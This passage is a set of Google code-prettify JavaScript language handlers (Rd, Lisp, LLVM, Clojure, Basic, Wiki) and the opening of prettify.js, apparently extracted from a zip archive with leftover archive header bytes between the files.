 * @fileoverview
 * Support for R documentation (Rd) files
 *
 * Minimal highlighting or Rd files, basically just highlighting
 * macros. It does not try to identify verbatim or R-like regions of
 * macros as that is too complicated for a lexer.  Descriptions of the
 * Rd format can be found
 * http://cran.r-project.org/doc/manuals/R-exts.html and
 * http://developer.r-project.org/parseRd.pdf.
 *
 * @author Jeffrey Arnold
 */
PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
            // whitespace
            [PR['PR_PLAIN'],   /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
            // all comments begin with '%'
            [PR['PR_COMMENT'], /^%[^\r\n]*/, null, '%']
        ],
        [// special macros with no args
            [PR['PR_LITERAL'], /^\\(?:cr|l?dots|R|tab)\b/],
	    // macros
            [PR['PR_KEYWORD'], /^\\[a-zA-Z@]+/],
	    // highlighted as macros, since technically they are
            [PR['PR_KEYWORD'],  /^#(?:ifn?def|endif)/ ],
	    // catch escaped brackets
	    [PR['PR_PLAIN'], /^\\[{}]/],
            // punctuation
            [PR['PR_PUNCTUATION'], /^[{}()\[\]]+/]
        ]),
    ['Rd', 'rd']);
PK!�57�>>#it_sanctum/js/prettify/lang-lisp.jsnu&1i�/**
 * @license
 * Copyright (C) 2008 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Common Lisp and related languages.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-lisp">(my lisp code)</pre>
 * The lang-cl class identifies the language as common lisp.
 * This file supports the following language extensions:
 *     lang-cl - Common Lisp
 *     lang-el - Emacs Lisp
 *     lang-lisp - Lisp
 *     lang-scm - Scheme
 *     lang-lsp - FAT 8.3 filename version of lang-lisp.
 *
 *
 * I used http://www.devincook.com/goldparser/doc/meta-language/grammar-LISP.htm
 * as the basis, but added line comments that start with ; and changed the atom
 * production to disallow unquoted semicolons.
 *
 * "Name"    = 'LISP'
 * "Author"  = 'John McCarthy'
 * "Version" = 'Minimal'
 * "About"   = 'LISP is an abstract language that organizes ALL'
 *           | 'data around "lists".'
 *
 * "Start Symbol" = [s-Expression]
 *
 * {Atom Char}   = {Printable} - {Whitespace} - [()"\'']
 *
 * Atom = ( {Atom Char} | '\'{Printable} )+
 *
 * [s-Expression] ::= [Quote] Atom
 *                  | [Quote] '(' [Series] ')'
 *                  | [Quote] '(' [s-Expression] '.' [s-Expression] ')'
 *
 * [Series] ::= [s-Expression] [Series]
 *            |
 *
 * [Quote]  ::= ''      !Quote = do not evaluate
 *            |
 *
 *
 * I used <a href="http://gigamonkeys.com/book/">Practical Common Lisp</a> as
 * the basis for the reserved word list.
 *
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         ['opn',             /^\(+/, null, '('],
         ['clo',             /^\)+/, null, ')'],
         // A line comment that starts with ;
         [PR['PR_COMMENT'],     /^;[^\r\n]*/, null, ';'],
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"']
        ],
        [
         [PR['PR_KEYWORD'],     /^(?:block|c[ad]+r|catch|con[ds]|def(?:ine|un)|do|eq|eql|equal|equalp|eval-when|flet|format|go|if|labels|lambda|let|load-time-value|locally|macrolet|multiple-value-call|nil|progn|progv|quote|require|return-from|setq|symbol-macrolet|t|tagbody|the|throw|unwind)\b/, null],
         [PR['PR_LITERAL'],
          /^[+\-]?(?:[0#]x[0-9a-f]+|\d+\/\d+|(?:\.\d+|\d+(?:\.\d*)?)(?:[ed][+\-]?\d+)?)/i],
         // A single quote possibly followed by a word that optionally ends with
         // = ! or ?.
         [PR['PR_LITERAL'],
          /^\'(?:-*(?:\w|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?)?/],
         // A word that optionally ends with = ! or ?.
         [PR['PR_PLAIN'],
          /^-*(?:[a-z_]|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?/i],
         // A printable non-space non-special character
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0()\"\\\';]+/]
        ]),
    ['cl', 'el', 'lisp', 'lsp', 'scm', 'ss', 'rkt']);
PK!�)�z��#it_sanctum/js/prettify/lang-llvm.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Nikhil Dabas
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for LLVM.
 * From https://gist.github.com/ndabas/2850418
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-llvm">(my LLVM code)</pre>
 *
 *
 * The regular expressions were adapted from:
 * https://github.com/hansstimer/llvm.tmbundle/blob/76fedd8f50fd6108b1780c51d79fbe3223de5f34/Syntaxes/LLVM.tmLanguage
 * 
 * http://llvm.org/docs/LangRef.html#constants describes the language grammar.
 * 
 * @author Nikhil Dabas
 */
PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^!?\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"'],
         // comment.llvm
         [PR['PR_COMMENT'],     /^;[^\r\n]*/, null, ';']
        ],
        [
         // variable.llvm
         [PR['PR_PLAIN'],       /^[%@!](?:[-a-zA-Z$._][-a-zA-Z$._0-9]*|\d+)/],

         // According to http://llvm.org/docs/LangRef.html#well-formedness
         // These reserved words cannot conflict with variable names, because none of them start with a prefix character ('%' or '@').
         [PR['PR_KEYWORD'],     /^[A-Za-z_][0-9A-Za-z_]*/, null],

         // constant.numeric.float.llvm
         [PR['PR_LITERAL'],     /^\d+\.\d+/],
         
         // constant.numeric.integer.llvm
         [PR['PR_LITERAL'],     /^(?:\d+|0[xX][a-fA-F0-9]+)/],

         // punctuation
         [PR['PR_PUNCTUATION'], /^[()\[\]{},=*<>:]|\.\.\.$/]
        ]),
    ['llvm', 'll']);
PK!}�E��
�
"it_sanctum/js/prettify/lang-clj.jsnu&1i�/**
 * @license Copyright (C) 2011 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Clojure.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-lisp">(my lisp code)</pre>
 * The lang-cl class identifies the language as common lisp.
 * This file supports the following language extensions:
 *     lang-clj - Clojure
 *
 *
 * I used lang-lisp.js as the basis for this adding the clojure specific
 * keywords and syntax.
 *
 * "Name"    = 'Clojure'
 * "Author"  = 'Rich Hickey'
 * "Version" = '1.2'
 * "About"   = 'Clojure is a lisp for the jvm with concurrency primitives and a richer set of types.'
 *
 *
 * I used <a href="http://clojure.org/Reference">Clojure.org Reference</a> as
 * the basis for the reserved word list.
 *
 *
 * @author jwall@google.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // clojure has more paren types than minimal lisp.
         ['opn',             /^[\(\{\[]+/, null, '([{'],
         ['clo',             /^[\)\}\]]+/, null, ')]}'],
         // A line comment that starts with ;
         [PR['PR_COMMENT'],     /^;[^\r\n]*/, null, ';'],
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"']
        ],
        [
         // clojure has a much larger set of keywords
         [PR['PR_KEYWORD'],     /^(?:def|if|do|let|quote|var|fn|loop|recur|throw|try|monitor-enter|monitor-exit|defmacro|defn|defn-|macroexpand|macroexpand-1|for|doseq|dosync|dotimes|and|or|when|not|assert|doto|proxy|defstruct|first|rest|cons|defprotocol|deftype|defrecord|reify|defmulti|defmethod|meta|with-meta|ns|in-ns|create-ns|import|intern|refer|alias|namespace|resolve|ref|deref|refset|new|set!|memfn|to-array|into-array|aset|gen-class|reduce|map|filter|find|nil?|empty?|hash-map|hash-set|vec|vector|seq|flatten|reverse|assoc|dissoc|list|list?|disj|get|union|difference|intersection|extend|extend-type|extend-protocol|prn)\b/, null],
         [PR['PR_TYPE'], /^:[0-9a-zA-Z\-]+/]
        ]),
    ['clj']);
PK!���$it_sanctum/js/prettify/lang-basic.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Peter Kofler
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// Contributed by peter dot kofler at code minus cop dot org

/**
 * @fileoverview
 * Registers a language handler for Basic.
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-basic">(my BASIC code)</pre>
 *
 * @author peter dot kofler at code minus cop dot org
 */

PR.registerLangHandler(
    PR.createSimpleLexer(
        [ // shortcutStylePatterns
          // "single-line-string"
          [PR.PR_STRING,        /^(?:"(?:[^\\"\r\n]|\\.)*(?:"|$))/, null, '"'],
          // Whitespace
          [PR.PR_PLAIN,         /^\s+/, null, ' \r\n\t\xA0']
        ],
        [ // fallthroughStylePatterns
          // A line comment that starts with REM
          [PR.PR_COMMENT,       /^REM[^\r\n]*/, null],
          [PR.PR_KEYWORD,       /^\b(?:AND|CLOSE|CLR|CMD|CONT|DATA|DEF ?FN|DIM|END|FOR|GET|GOSUB|GOTO|IF|INPUT|LET|LIST|LOAD|NEW|NEXT|NOT|ON|OPEN|OR|POKE|PRINT|READ|RESTORE|RETURN|RUN|SAVE|STEP|STOP|SYS|THEN|TO|VERIFY|WAIT)\b/, null],
          [PR.PR_PLAIN,         /^[A-Z][A-Z0-9]?(?:\$|%)?/i, null],
          // Literals .0, 0, 0.0 0E13
          [PR.PR_LITERAL,       /^(?:\d+(?:\.\d*)?|\.\d+)(?:e[+\-]?\d+)?/i,  null, '0123456789'],
          [PR.PR_PUNCTUATION,   /^.[^\s\w\.$%"]*/, null]
          // [PR.PR_PUNCTUATION,   /^[-,:;!<>=\+^\/\*]+/]
        ]),
    ['basic','cbm']);
PK!S|���#it_sanctum/js/prettify/lang-wiki.jsnu&1i�/**
 * @license
 * Copyright (C) 2009 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Wiki pages.
 *
 * Based on WikiSyntax at http://code.google.com/p/support/wiki/WikiSyntax
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t \xA0a-gi-z0-9]+/, null,
          '\t \xA0abcdefgijklmnopqrstuvwxyz0123456789'],
         // Wiki formatting
         [PR['PR_PUNCTUATION'], /^[=*~\^\[\]]+/, null, '=*~^[]']
        ],
        [
         // Meta-info like #summary, #labels, etc.
         ['lang-wiki.meta',  /(?:^^|\r\n?|\n)(#[a-z]+)\b/],
         // A WikiWord
         [PR['PR_LITERAL'],     /^(?:[A-Z][a-z][a-z0-9]+[A-Z][a-z][a-zA-Z0-9]+)\b/
          ],
         // A preformatted block in an unknown language
         ['lang-',           /^\{\{\{([\s\S]+?)\}\}\}/],
         // A block of source code in an unknown language
         ['lang-',           /^`([^\r\n`]+)`/],
         // An inline URL.
         [PR['PR_STRING'],
          /^https?:\/\/[^\/?#\s]*(?:\/[^?#\s]*)?(?:\?[^#\s]*)?(?:#\S*)?/i],
         [PR['PR_PLAIN'],       /^(?:\r\n|[\s\S])[^#=*~^A-Zh\{`\[\r\n]*/]
        ]),
    ['wiki']);

PR['registerLangHandler'](
    PR['createSimpleLexer']([[PR['PR_KEYWORD'], /^#[a-z]+/i, null, '#']], []),
    ['wiki.meta']);
PK!�2��5�5�"it_sanctum/js/prettify/prettify.jsnu&1i�/**
 * @license
 * Copyright (C) 2006 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * some functions for browser-side pretty printing of code contained in html.
 *
 * <p>
 * For a fairly comprehensive set of languages see the
 * <a href="https://github.com/google/code-prettify#for-which-languages-does-it-work">README</a>
 * file that came with this source.  At a minimum, the lexer should work on a
 * number of languages including C and friends, Java, Python, Bash, SQL, HTML,
 * XML, CSS, Javascript, and Makefiles.  It works passably on Ruby, PHP and Awk
 * and a subset of Perl, but, because of commenting conventions, doesn't work on
 * Smalltalk, Lisp-like, or CAML-like languages without an explicit lang class.
 * <p>
 * Usage: <ol>
 * <li> include this source file in an html page via
 *   {@code <script type="text/javascript" src="/path/to/prettify.js"></script>}
 * <li> define style rules.  See the example page for examples.
 * <li> mark the {@code <pre>} and {@code <code>} tags in your source with
 *    {@code class=prettyprint.}
 *    You can also use the (html deprecated) {@code <xmp>} tag, but the pretty
 *    printer needs to do more substantial DOM manipulations to support that, so
 *    some css styles may not be preserved.
 * </ol>
 * That's it.  I wanted to keep the API as simple as possible, so there's no
 * need to specify which language the code is in, but if you wish, you can add
 * another class to the {@code <pre>} or {@code <code>} element to specify the
 * language, as in {@code <pre class="prettyprint lang-java">}.  Any class that
 * starts with "lang-" followed by a file extension, specifies the file type.
 * See the "lang-*.js" files in this directory for code that implements
 * per-language file handlers.
 * <p>
 * Change log:<br>
 * cbeust, 2006/08/22
 * <blockquote>
 *   Java annotations (start with "@") are now captured as literals ("lit")
 * </blockquote>
 * @requires console
 */

// JSLint declarations
/*global console, document, navigator, setTimeout, window, define */


/**
 * {@type !{
 *   'createSimpleLexer': function (Array, Array): (function (JobT)),
 *   'registerLangHandler': function (function (JobT), Array.<string>),
 *   'PR_ATTRIB_NAME': string,
 *   'PR_ATTRIB_NAME': string,
 *   'PR_ATTRIB_VALUE': string,
 *   'PR_COMMENT': string,
 *   'PR_DECLARATION': string,
 *   'PR_KEYWORD': string,
 *   'PR_LITERAL': string,
 *   'PR_NOCODE': string,
 *   'PR_PLAIN': string,
 *   'PR_PUNCTUATION': string,
 *   'PR_SOURCE': string,
 *   'PR_STRING': string,
 *   'PR_TAG': string,
 *   'PR_TYPE': string,
 *   'prettyPrintOne': function (string, string, number|boolean),
 *   'prettyPrint': function (?function, ?(HTMLElement|HTMLDocument))
 * }}
 * @const
 */
/**
* @typedef {!Array.<number|string>}
* Alternating indices and the decorations that should be inserted there.
* The indices are monotonically increasing.
*/
var DecorationsT;

/**
* @typedef {!{
*   sourceNode: !Element,
*   pre: !(number|boolean),
*   langExtension: ?string,
*   numberLines: ?(number|boolean),
*   sourceCode: ?string,
*   spans: ?(Array.<number|Node>),
*   basePos: ?number,
*   decorations: ?DecorationsT
* }}
* <dl>
*  <dt>sourceNode<dd>the element containing the source
*  <dt>sourceCode<dd>source as plain text
*  <dt>pre<dd>truthy if white-space in text nodes
*     should be considered significant.
*  <dt>spans<dd> alternating span start indices into source
*     and the text node or element (e.g. {@code <BR>}) corresponding to that
*     span.
*  <dt>decorations<dd>an array of style classes preceded
*     by the position at which they start in job.sourceCode in order
*  <dt>basePos<dd>integer position of this.sourceCode in the larger chunk of
*     source.
* </dl>
*/
var JobT;

/**
* @typedef {!{
*   sourceCode: string,
*   spans: !(Array.<number|Node>)
* }}
* <dl>
*  <dt>sourceCode<dd>source as plain text
*  <dt>spans<dd> alternating span start indices into source
*     and the text node or element (e.g. {@code <BR>}) corresponding to that
*     span.
* </dl>
*/
var SourceSpansT;

/** @define {boolean} */
var IN_GLOBAL_SCOPE = false;

var PR;

/**
 * Split {@code prettyPrint} into multiple timeouts so as not to interfere with
 * UI events.
 * If set to {@code false}, {@code prettyPrint()} is synchronous.
 */
window['PR_SHOULD_USE_CONTINUATION'] = true;

/**
 * Pretty print a chunk of code.
 * @param {string} sourceCodeHtml The HTML to pretty print.
 * @param {string} opt_langExtension The language name to use.
 *     Typically, a filename extension like 'cpp' or 'java'.
 * @param {number|boolean} opt_numberLines True to number lines,
 *     or the 1-indexed number of the first line in sourceCodeHtml.
 * @return {string} code as html, but prettier
 */
var prettyPrintOne;
/**
 * Find all the {@code <pre>} and {@code <code>} tags in the DOM with
 * {@code class=prettyprint} and prettify them.
 *
 * @param {Function} opt_whenDone called when prettifying is done.
 * @param {HTMLElement|HTMLDocument} opt_root an element or document
 *   containing all the elements to pretty print.
 *   Defaults to {@code document.body}.
 */
var prettyPrint;


(function () {
  var win = window;
  // Keyword lists for various languages.
  // We use things that coerce to strings to make them compact when minified
  // and to defeat aggressive optimizers that fold large string constants.
  var FLOW_CONTROL_KEYWORDS = ["break,continue,do,else,for,if,return,while"];
  var C_KEYWORDS = [FLOW_CONTROL_KEYWORDS,"auto,case,char,const,default," +
      "double,enum,extern,float,goto,inline,int,long,register,short,signed," +
      "sizeof,static,struct,switch,typedef,union,unsigned,void,volatile"];
  var COMMON_KEYWORDS = [C_KEYWORDS,"catch,class,delete,false,import," +
      "new,operator,private,protected,public,this,throw,true,try,typeof"];
  var CPP_KEYWORDS = [COMMON_KEYWORDS,"alignof,align_union,asm,axiom,bool," +
      "concept,concept_map,const_cast,constexpr,decltype,delegate," +
      "dynamic_cast,explicit,export,friend,generic,late_check," +
      "mutable,namespace,nullptr,property,reinterpret_cast,static_assert," +
      "static_cast,template,typeid,typename,using,virtual,where"];
  var JAVA_KEYWORDS = [COMMON_KEYWORDS,
      "abstract,assert,boolean,byte,extends,finally,final,implements,import," +
      "instanceof,interface,null,native,package,strictfp,super,synchronized," +
      "throws,transient"];
  var CSHARP_KEYWORDS = [COMMON_KEYWORDS,
      "abstract,as,base,bool,by,byte,checked,decimal,delegate,descending," +
      "dynamic,event,finally,fixed,foreach,from,group,implicit,in,interface," +
      "internal,into,is,let,lock,null,object,out,override,orderby,params," +
      "partial,readonly,ref,sbyte,sealed,stackalloc,string,select,uint,ulong," +
      "unchecked,unsafe,ushort,var,virtual,where"];
  var COFFEE_KEYWORDS = "all,and,by,catch,class,else,extends,false,finally," +
      "for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then," +
      "throw,true,try,unless,until,when,while,yes";
  var JSCRIPT_KEYWORDS = [COMMON_KEYWORDS,
      "abstract,async,await,constructor,debugger,enum,eval,export,function," +
      "get,implements,instanceof,interface,let,null,set,undefined,var,with," +
      "yield,Infinity,NaN"];
  var PERL_KEYWORDS = "caller,delete,die,do,dump,elsif,eval,exit,foreach,for," +
      "goto,if,import,last,local,my,next,no,our,print,package,redo,require," +
      "sub,undef,unless,until,use,wantarray,while,BEGIN,END";
  var PYTHON_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "and,as,assert,class,def,del," +
      "elif,except,exec,finally,from,global,import,in,is,lambda," +
      "nonlocal,not,or,pass,print,raise,try,with,yield," +
      "False,True,None"];
  var RUBY_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "alias,and,begin,case,class," +
      "def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo," +
      "rescue,retry,self,super,then,true,undef,unless,until,when,yield," +
      "BEGIN,END"];
  var SH_KEYWORDS = [FLOW_CONTROL_KEYWORDS, "case,done,elif,esac,eval,fi," +
      "function,in,local,set,then,until"];
  var ALL_KEYWORDS = [
      CPP_KEYWORDS, CSHARP_KEYWORDS, JAVA_KEYWORDS, JSCRIPT_KEYWORDS,
      PERL_KEYWORDS, PYTHON_KEYWORDS, RUBY_KEYWORDS, SH_KEYWORDS];
  var C_TYPES = /^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)\b/;

  // token style names.  correspond to css classes
  /**
   * token style for a string literal
   * @const
   */
  var PR_STRING = 'str';
  /**
   * token style for a keyword
   * @const
   */
  var PR_KEYWORD = 'kwd';
  /**
   * token style for a comment
   * @const
   */
  var PR_COMMENT = 'com';
  /**
   * token style for a type
   * @const
   */
  var PR_TYPE = 'typ';
  /**
   * token style for a literal value.  e.g. 1, null, true.
   * @const
   */
  var PR_LITERAL = 'lit';
  /**
   * token style for a punctuation string.
   * @const
   */
  var PR_PUNCTUATION = 'pun';
  /**
   * token style for plain text.
   * @const
   */
  var PR_PLAIN = 'pln';

  /**
   * token style for an sgml tag.
   * @const
   */
  var PR_TAG = 'tag';
  /**
   * token style for a markup declaration such as a DOCTYPE.
   * @const
   */
  var PR_DECLARATION = 'dec';
  /**
   * token style for embedded source.
   * @const
   */
  var PR_SOURCE = 'src';
  /**
   * token style for an sgml attribute name.
   * @const
   */
  var PR_ATTRIB_NAME = 'atn';
  /**
   * token style for an sgml attribute value.
   * @const
   */
  var PR_ATTRIB_VALUE = 'atv';

  /**
   * A class that indicates a section of markup that is not code, e.g. to allow
   * embedding of line numbers within code listings.
   * @const
   */
  var PR_NOCODE = 'nocode';

  
  
  /**
   * A set of tokens that can precede a regular expression literal in
   * javascript
   * http://web.archive.org/web/20070717142515/http://www.mozilla.org/js/language/js20/rationale/syntax.html
   * has the full list, but I've removed ones that might be problematic when
   * seen in languages that don't support regular expression literals.
   *
   * <p>Specifically, I've removed any keywords that can't precede a regexp
   * literal in a syntactically legal javascript program, and I've removed the
   * "in" keyword since it's not a keyword in many languages, and might be used
   * as a count of inches.
   *
   * <p>The link above does not accurately describe EcmaScript rules since
   * it fails to distinguish between (a=++/b/i) and (a++/b/i) but it works
   * very well in practice.
   *
   * @private
   * @const
   */
  var REGEXP_PRECEDER_PATTERN = '(?:^^\\.?|[+-]|[!=]=?=?|\\#|%=?|&&?=?|\\(|\\*=?|[+\\-]=|->|\\/=?|::?|<<?=?|>>?>?=?|,|;|\\?|@|\\[|~|{|\\^\\^?=?|\\|\\|?=?|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\\s*';
  
  // CAVEAT: this does not properly handle the case where a regular
  // expression immediately follows another since a regular expression may
  // have flags for case-sensitivity and the like.  Having regexp tokens
  // adjacent is not valid in any language I'm aware of, so I'm punting.
  // TODO: maybe style special characters inside a regexp as punctuation.

  /**
   * Given a group of {@link RegExp}s, returns a {@code RegExp} that globally
   * matches the union of the sets of strings matched by the input RegExp.
   * Since it matches globally, if the input strings have a start-of-input
   * anchor (/^.../), it is ignored for the purposes of unioning.
   * @param {Array.<RegExp>} regexs non multiline, non-global regexs.
   * @return {RegExp} a global regex.
   */
  function combinePrefixPatterns(regexs) {
    var capturedGroupIndex = 0;
  
    var needToFoldCase = false;
    var ignoreCase = false;
    for (var i = 0, n = regexs.length; i < n; ++i) {
      var regex = regexs[i];
      if (regex.ignoreCase) {
        ignoreCase = true;
      } else if (/[a-z]/i.test(regex.source.replace(
                     /\\u[0-9a-f]{4}|\\x[0-9a-f]{2}|\\[^ux]/gi, ''))) {
        needToFoldCase = true;
        ignoreCase = false;
        break;
      }
    }
  
    var escapeCharToCodeUnit = {
      'b': 8,
      't': 9,
      'n': 0xa,
      'v': 0xb,
      'f': 0xc,
      'r': 0xd
    };
  
    function decodeEscape(charsetPart) {
      var cc0 = charsetPart.charCodeAt(0);
      if (cc0 !== 92 /* \\ */) {
        return cc0;
      }
      var c1 = charsetPart.charAt(1);
      cc0 = escapeCharToCodeUnit[c1];
      if (cc0) {
        return cc0;
      } else if ('0' <= c1 && c1 <= '7') {
        return parseInt(charsetPart.substring(1), 8);
      } else if (c1 === 'u' || c1 === 'x') {
        return parseInt(charsetPart.substring(2), 16);
      } else {
        return charsetPart.charCodeAt(1);
      }
    }
  
    function encodeEscape(charCode) {
      if (charCode < 0x20) {
        return (charCode < 0x10 ? '\\x0' : '\\x') + charCode.toString(16);
      }
      var ch = String.fromCharCode(charCode);
      return (ch === '\\' || ch === '-' || ch === ']' || ch === '^')
          ? "\\" + ch : ch;
    }
  
    function caseFoldCharset(charSet) {
      var charsetParts = charSet.substring(1, charSet.length - 1).match(
          new RegExp(
              '\\\\u[0-9A-Fa-f]{4}'
              + '|\\\\x[0-9A-Fa-f]{2}'
              + '|\\\\[0-3][0-7]{0,2}'
              + '|\\\\[0-7]{1,2}'
              + '|\\\\[\\s\\S]'
              + '|-'
              + '|[^-\\\\]',
              'g'));
      var ranges = [];
      var inverse = charsetParts[0] === '^';
  
      var out = ['['];
      if (inverse) { out.push('^'); }
  
      for (var i = inverse ? 1 : 0, n = charsetParts.length; i < n; ++i) {
        var p = charsetParts[i];
        if (/\\[bdsw]/i.test(p)) {  // Don't muck with named groups.
          out.push(p);
        } else {
          var start = decodeEscape(p);
          var end;
          if (i + 2 < n && '-' === charsetParts[i + 1]) {
            end = decodeEscape(charsetParts[i + 2]);
            i += 2;
          } else {
            end = start;
          }
          ranges.push([start, end]);
          // If the range might intersect letters, then expand it.
          // This case handling is too simplistic.
          // It does not deal with non-latin case folding.
          // It works for latin source code identifiers though.
          if (!(end < 65 || start > 122)) {
            if (!(end < 65 || start > 90)) {
              ranges.push([Math.max(65, start) | 32, Math.min(end, 90) | 32]);
            }
            if (!(end < 97 || start > 122)) {
              ranges.push([Math.max(97, start) & ~32, Math.min(end, 122) & ~32]);
            }
          }
        }
      }
  
      // [[1, 10], [3, 4], [8, 12], [14, 14], [16, 16], [17, 17]]
      // -> [[1, 12], [14, 14], [16, 17]]
      ranges.sort(function (a, b) { return (a[0] - b[0]) || (b[1]  - a[1]); });
      var consolidatedRanges = [];
      var lastRange = [];
      for (var i = 0; i < ranges.length; ++i) {
        var range = ranges[i];
        if (range[0] <= lastRange[1] + 1) {
          lastRange[1] = Math.max(lastRange[1], range[1]);
        } else {
          consolidatedRanges.push(lastRange = range);
        }
      }
  
      for (var i = 0; i < consolidatedRanges.length; ++i) {
        var range = consolidatedRanges[i];
        out.push(encodeEscape(range[0]));
        if (range[1] > range[0]) {
          if (range[1] + 1 > range[0]) { out.push('-'); }
          out.push(encodeEscape(range[1]));
        }
      }
      out.push(']');
      return out.join('');
    }
  
    function allowAnywhereFoldCaseAndRenumberGroups(regex) {
      // Split into character sets, escape sequences, punctuation strings
      // like ('(', '(?:', ')', '^'), and runs of characters that do not
      // include any of the above.
      var parts = regex.source.match(
          new RegExp(
              '(?:'
              + '\\[(?:[^\\x5C\\x5D]|\\\\[\\s\\S])*\\]'  // a character set
              + '|\\\\u[A-Fa-f0-9]{4}'  // a unicode escape
              + '|\\\\x[A-Fa-f0-9]{2}'  // a hex escape
              + '|\\\\[0-9]+'  // a back-reference or octal escape
              + '|\\\\[^ux0-9]'  // other escape sequence
              + '|\\(\\?[:!=]'  // start of a non-capturing group
              + '|[\\(\\)\\^]'  // start/end of a group, or line start
              + '|[^\\x5B\\x5C\\(\\)\\^]+'  // run of other characters
              + ')',
              'g'));
      var n = parts.length;
  
      // Maps captured group numbers to the number they will occupy in
      // the output or to -1 if that has not been determined, or to
      // undefined if they need not be capturing in the output.
      var capturedGroups = [];
  
      // Walk over and identify back references to build the capturedGroups
      // mapping.
      for (var i = 0, groupIndex = 0; i < n; ++i) {
        var p = parts[i];
        if (p === '(') {
          // groups are 1-indexed, so max group index is count of '('
          ++groupIndex;
        } else if ('\\' === p.charAt(0)) {
          var decimalValue = +p.substring(1);
          if (decimalValue) {
            if (decimalValue <= groupIndex) {
              capturedGroups[decimalValue] = -1;
            } else {
              // Replace with an unambiguous escape sequence so that
              // an octal escape sequence does not turn into a backreference
              // to a capturing group from an earlier regex.
              parts[i] = encodeEscape(decimalValue);
            }
          }
        }
      }
  
      // Renumber groups and reduce capturing groups to non-capturing groups
      // where possible.
      for (var i = 1; i < capturedGroups.length; ++i) {
        if (-1 === capturedGroups[i]) {
